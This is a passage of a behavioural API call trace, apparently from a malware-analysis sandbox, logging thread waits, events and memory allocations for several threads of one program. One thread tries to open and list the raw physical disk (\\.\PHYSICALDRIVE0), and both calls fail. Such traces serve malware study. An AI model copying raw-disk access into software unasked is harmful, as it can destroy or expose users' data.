Alertable=0, Time=0x306fe40) returned 0x102 [0301.952] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0302.112] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0302.295] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0302.580] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0302.786] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0302.937] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0303.043] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0303.071] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0303.080] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0303.081] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0303.110] timeEndPeriod (uPeriod=0x1) returned 0x0 [0303.110] WaitForMultipleObjects (nCount=0x2, lpHandles=0x306fde8*=0x10c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0303.322] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0303.322] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0303.814] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0304.180] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0304.548] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0304.726] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0305.151] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0305.594] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0305.925] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0306.202] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.203] WaitForMultipleObjects (nCount=0x2, lpHandles=0x306fde8*=0x10c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0306.919] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.919] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0307.183] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0307.650] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0308.071] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0308.321] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0308.744] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0308.936] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0309.252] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0310.181] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0310.475] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0311.118] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0312.686] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0313.266] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0313.590] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0314.285] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0314.705] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0315.200] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0315.517] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0315.970] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0316.574] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0316.863] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) returned 0x102 [0317.277] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x306fe40) Thread: id = 162 os_tid = 0x17c [0267.644] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x326fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x326fea0*=0xc8) returned 1 [0267.644] VirtualQuery (in: lpAddress=0x326fec0, lpBuffer=0x326fec0, dwLength=0x30 | out: lpBuffer=0x326fec0*(BaseAddress=0x326f000, AllocationBase=0x3070000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff9a85)) returned 0x30 [0267.645] SwitchToThread () returned 1 [0267.808] VirtualAlloc (lpAddress=0xc00003e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00003e000 [0267.809] VirtualAlloc (lpAddress=0xc000040000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000040000 [0267.810] VirtualAlloc (lpAddress=0xc000042000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000042000 [0267.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4604f0, lpParameter=0xc00003e000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd4 [0267.811] CloseHandle (hObject=0xd4) returned 1 [0267.812] SetEvent (hEvent=0xcc) returned 1 [0267.812] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd4 [0267.812] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd8 [0267.812] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) [0277.886] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0278.788] SetEvent (hEvent=0xcc) returned 1 [0278.788] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0279.735] SetEvent (hEvent=0xcc) returned 1 [0279.735] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0280.478] SetEvent (hEvent=0xcc) returned 1 [0280.478] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0281.348] SetEvent (hEvent=0xcc) returned 1 [0281.348] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0283.411] SetEvent (hEvent=0xcc) returned 1 [0283.411] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0284.011] SetEvent (hEvent=0xcc) returned 1 [0284.011] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0284.704] SetEvent (hEvent=0xcc) returned 1 [0284.704] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0285.434] SetEvent (hEvent=0xcc) returned 1 [0285.434] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0286.024] SetEvent (hEvent=0xcc) returned 1 [0286.024] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0287.170] SetEvent (hEvent=0xcc) returned 1 [0287.170] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0287.931] SetEvent (hEvent=0xcc) returned 1 [0287.931] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0288.798] SetEvent (hEvent=0xcc) returned 1 [0288.798] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0289.792] SetEvent (hEvent=0xcc) returned 1 [0289.792] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0290.404] SetEvent (hEvent=0xcc) returned 1 [0290.404] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0291.395] SetEvent (hEvent=0xcc) returned 1 [0291.395] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0292.358] SetEvent (hEvent=0xcc) returned 1 [0292.358] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0293.053] SetEvent (hEvent=0xcc) returned 1 [0293.053] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0294.780] SwitchToThread () returned 1 [0294.897] SetEvent (hEvent=0xe0) returned 1 [0295.855] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="CreateFileW") returned 0x7ffd4e1ed8b0 [0295.856] CreateFileW (lpFileName="\\\\.\\PHYSICALDRIVE0" (normalized: "\\device\\harddisk0\\dr0"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0295.856] GetProcAddress (hModule=0x7ffd4e1c0000, lpProcName="FindFirstFileW") returned 0x7ffd4e1ed980 [0295.856] FindFirstFileW (in: lpFileName="\\\\.\\PHYSICALDRIVE0\\*", lpFindFileData=0xc00002bb78 | out: lpFindFileData=0xc00002bb78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0295.856] VirtualAlloc (lpAddress=0xc0000d8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d8000 [0295.859] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0302.938] SetEvent (hEvent=0xec) returned 1 [0302.938] SetEvent (hEvent=0xcc) returned 1 [0302.938] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0303.079] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0303.081] SetEvent (hEvent=0xec) returned 1 [0303.081] SetEvent (hEvent=0xcc) returned 1 [0303.081] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0304.180] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) Thread: id = 163 os_tid = 0x704 [0267.814] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x346fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x346fea0*=0xdc) returned 1 [0267.814] VirtualQuery (in: lpAddress=0x346fec0, lpBuffer=0x346fec0, dwLength=0x30 | out: lpBuffer=0x346fec0*(BaseAddress=0x346f000, AllocationBase=0x3270000, AllocationProtect=0x4, __alignment1=0xfffff802, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff9a84)) returned 0x30 [0267.826] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe0 [0267.826] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4 [0267.826] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) [0277.858] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) [0295.334] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0302.940] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0303.071] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0303.081] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0303.714] SetEvent (hEvent=0xd4) returned 1 [0304.180] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0304.727] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0307.198] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) Thread: id = 164 os_tid = 0x13d8 [0267.967] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x366fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x366fea0*=0xe8) returned 1 [0267.967] VirtualQuery (in: lpAddress=0x366fec0, lpBuffer=0x366fec0, dwLength=0x30 | out: lpBuffer=0x366fec0*(BaseAddress=0x366f000, AllocationBase=0x3470000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0267.988] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xec [0267.988] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xf0 [0267.988] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0268.820] SetEvent (hEvent=0xcc) returned 1 [0268.820] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0269.788] SetEvent (hEvent=0xcc) returned 1 [0269.814] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0270.947] SetEvent (hEvent=0xcc) returned 1 [0270.947] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0271.654] SetEvent (hEvent=0xcc) returned 1 [0271.654] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0272.495] SetEvent (hEvent=0xcc) returned 1 [0272.495] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0273.544] SetEvent (hEvent=0xcc) returned 1 [0273.544] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0274.689] SetEvent (hEvent=0xcc) returned 1 [0274.689] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0275.550] SetEvent (hEvent=0xcc) returned 1 [0275.550] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0276.681] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0276.817] SetEvent (hEvent=0xcc) returned 1 [0276.817] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0277.731] SwitchToThread () returned 1 [0277.858] SetEvent (hEvent=0xd4) returned 1 [0277.858] SetEvent (hEvent=0xcc) returned 1 [0277.858] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) [0303.043] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0303.071] SetEvent (hEvent=0xd4) returned 1 [0303.071] SetEvent (hEvent=0xcc) returned 1 [0303.071] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0303.082] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0303.322] SetEvent (hEvent=0xe0) returned 1 [0303.322] VirtualAlloc (lpAddress=0xc0005d6000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0005d6000 [0303.326] SwitchToThread () returned 1 [0303.985] SwitchToThread () returned 1 [0304.212] SwitchToThread () returned 1 [0304.549] WaitForMultipleObjects (nCount=0x2, lpHandles=0x366fdf8*=0xec, bWaitAll=0, dwMilliseconds=0x1) returned 0x102 [0304.727] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0304.727] WaitForMultipleObjects (nCount=0x2, lpHandles=0x366fdf8*=0xec, bWaitAll=0, dwMilliseconds=0x1) returned 0x102 [0305.166] WaitForMultipleObjects (nCount=0x2, lpHandles=0x366fdf8*=0xec, bWaitAll=0, dwMilliseconds=0x1) returned 0x102 [0305.595] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0305.595] WaitForMultipleObjects (nCount=0x2, lpHandles=0x366fdf8*=0xec, bWaitAll=0, dwMilliseconds=0x1) returned 0x102 [0305.925] WaitForMultipleObjects (nCount=0x2, lpHandles=0x366fdf8*=0xec, bWaitAll=0, dwMilliseconds=0x1) returned 0x0 [0306.201] WaitForMultipleObjects (nCount=0x2, lpHandles=0x366fe20*=0xec, bWaitAll=0, dwMilliseconds=0x1) returned 0x102 [0306.415] WaitForMultipleObjects (nCount=0x2, lpHandles=0x366fe20*=0xec, bWaitAll=0, dwMilliseconds=0x1) returned 0x0 [0306.895] SetEvent (hEvent=0x10c) returned 1 [0306.920] SetEvent (hEvent=0xcc) returned 1 [0306.969] WaitForMultipleObjects (nCount=0x2, lpHandles=0x366fe08*=0xec, bWaitAll=0, dwMilliseconds=0x1) returned 0x102 [0307.183] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff) returned 0x0 [0307.195] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0xffffffff)